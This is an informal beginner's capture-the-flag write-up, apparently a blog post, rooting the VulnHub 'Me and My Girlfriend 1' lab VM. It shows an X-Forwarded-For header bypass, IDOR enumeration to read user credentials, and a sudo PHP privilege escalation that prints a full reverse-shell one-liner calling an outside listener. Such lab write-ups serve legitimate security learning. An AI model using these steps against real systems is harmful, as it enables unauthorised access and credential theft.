This my 1st writeup. so, please forget my mistake.
So let’s start; I think everybody knows about vulnhub(if anybody didn’t know ,try to explore is blog:https://medium.com/@gavinloughridge/a-beginners-guide-to-vulnhub-part-1-52b06466635d)
The machine was released on 13 Dec 2019.(Here is the link:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/)
Difficulty Level: Beginner
Notes: there are 2 flag files
Learning: Web Application | Simple Privilege Escalation
This is a boot to root challenge.
let us start hacking!
Run the simple command in your terminal :arp-scan — localnet
after that, we see there is a IP address(192.168.50.138) where my Vulnerability VM running.
I want to know which service was running on that machine. for that I use Nmap.
Here we see that port 80 was open. that means there was webservice was running.
just type the ip in your web browser
when i visit , it gives me this message , i think it gives me any Hint (like only admin or any local address access this ,like 127.0.0.1)
open the source code(ctrl+U)
Here some message it gives me , I think it may be another any Hint. when i see x-forwarded-for, I am pretty sure their maybe any HOST HEADER attack possible. for testing host header, I refresh the page and
Intercept the trafic in burp suite
After intercept i simply added this header
X-Forwarded-For: localhost
boom we got an interesting page 😎😎😎
it looks like any sign/signup page..😉🤷♂️
click on login tap
I think there may be any SQL injection. so i brute force some payload .but I failed.😢😢
Click on Register tab
here I registered myself in the register area and logged in😜😜
when I see the id parameter in the URL, I think there some parameter pollution bug. so change it from 0 to 12. when id =5; it gives me some interesting thing.🤷♀️🤷♀️
change id =5 in URL
That means some existing user in at id =5;
click on profile
Boom I got some user details.🤑🤑
In this CTF, If you remember in the description, Alice was very important to the scenario. 🚑🚑
Then I remembered that we also had a ssh port open and i loggin it via ssh
After logging,i find for flag1 . for that, I was ls -a command
IN .my_secrect folder looks like some juicy so enter in that folder.
BOOM I find flag1 😎✌🤞🤞, now looking for priv esc👀👀👀👀🐱👤
now i look for sudo rights for that, I use this command sudo -l
Here I see , Alice can run PHP program as a Root user
so i run this command
sudo /usr/bin/php -r ‘$sock=fsockopen(“192.168.50.128”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
as well as I run netcat for listing at 1234 port
BOOM i got root shell😎🐱👤🐱👤🐱👤🐱🏍🐱🏍🐱🏍
now it’s time for find the flag2😁😁😁😁
so I move to root .then type ls command and find flag2
Thanks for reading my blog ..i hope it will help you😁😁🐱👤🐱👤😎😎
